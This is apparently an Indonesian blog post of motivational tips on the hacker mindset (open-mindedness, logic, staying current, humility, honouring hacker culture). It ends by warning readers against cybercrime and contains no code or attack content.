Banyak hal-hal baru muncul, dan setiap hal (apapun) akan memberikan kita pelajaran berarti untuk hidup dan hidup adalah HACKING. Hindarilah untuk bersikap skeptis dan mulailah untuk berpikiran terbuka. Hal-hal baru -terlebih-lebih yang begitu radikal-, banyak di tentang oleh sebagian orang skeptis, namun sebuah pemikiran terbuka akan memberikan alur yang baik dalam memperolah ilmu. Ilmu ada dimana-mana. Bahkan dalam suatu yang dianggap kotor. Sebagai contoh, coba anda bandingkan ‘kotoran’ sapi (hewan herbivora) dengan ‘kotoran’ kucing (hewan karnivora). Dapat kita lihat kalau kotoran sapi ‘lebih menggunung’ dari pada kotoran kucing, dan tidak terlepas dari itu, secara umum dapat kita tarik kesimpulan, bahwa hewan herbivora (pemakan tanaman) lebih banyak dari pada hewan karnivora (pemakan daging). Penyebab yang paling relevan untuk hal ini adalah faktor ‘makanan’. Tumbuhan yang dikonsumsi oleh hewan herbivora (dalam contoh ini sapi) mengandung ‘selulose’ atau serat lebih sulit dicerna, sehingga lebih banyak meninggalkan zat sisa. Hal ini tidak berlaku pada hewan karnivora (dalam contoh ini kucing). Daging lebih mudah dicerna, sehingga hanya meninggalkan sedikit zat sisa.
Dengan sedikit imajinasi kotor, coba bayangkan hal-hal yang lebih kotor lagi untuk dianalisa dan diambil pelajarannya. Dalam lingkup komputer, pelajarilah semua hal-hal baru. Anda bisa menemukan banyak hal baru melalui artikel, journal, atau berita-berita ‘nerd’ di ‘slashdot’.

Selalu gunakan logika

Berpikir dengan logika sangat diperlukan dalam Hacking. Dalam Hacking anda akan berhadapan dengan berbagai keadaan untuk dianalisa dan dipecahkan secara logika. Logika akan sangat membantu anda untuk menghidupkan kembali rasionalitas yang hilang dan berpikir membantu anda untuk hidup dan tetap hidup.

Ikuti perkembangan teknologi dan informasi

Teknologi Informasi berkembang sangat cepat. Sebuah bahasa pemprograman yang kita pelajari hari ini bisa cepat berganti dengan bahasa atau visual programming baru yang lebih mudah –baca memudahkan, alih-alih membodohkan-. Semua itu berganti seiring berlalunya waktu dan ketika kita tersadar kita sudah jauh ketinggalan.
Ada baiknya anda selalu membaca, atau minimal mendapatkan ‘digest’ dari ilmu-ilmu/info terbaru. Anda juga bisa mendapatkan informasi dari Mailing List dan NewsGroup. Dengan selalu up-to-date, anda akan selalu dekat dengan informasi.

Ketahui hal-hal yang belum diketahui

Dalam apapun didunia ini, kita harus bercermin. Buang semua prasangka dan nilai-nilai. Buang anggapan sepihak kalau ‘saya adalah seorang wizard’. Duduklah sejenak dan mulai berpikir.


Mengabdi kepada budaya Hacker

Setelah semuanya selesai dan anda sedang beristirahat setelah aktifitas Hacking 37 Jam yang melelahkan. Coba ingat kembali.
  • Siapa yang memperkenalkan anda kepada komputer ?
  • Siapa yang membimbing anda mempelajarinya ?
  • Siapa yang dengan setia menemani anda mengejar informasi ?
  • Siapa yang pertama sekali mengenalkan anda dengan HACKING ?
  • Siapa yang mengajari anda teknik-teknik Hacking Dasar ?
  • Siapa yang mengajari anda tentang bersikap dan berfikir layaknya HACKER ?
  • Siapa yang membuat sistem operasi Hacker, Linux ?
  • Siapa yang mengembangkannya ?
Jangan pernah cepat puas,tetapi ingatlah jangan pernah menjadikan anda besar kepala atau sombong.Ingatlah saat anda dahulu berada di titik 0.Gunakan ilmu yang anda kuasai dengan bijak dan membantu sesama.Cukuplah untuk pengetahuan,Kenap...?karena tiudak kehidupan yang jelas dari seorang hacker.Apalagi hingga menjadi mafia/cyber crime.










READ MORE - Hacker or Cracker

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS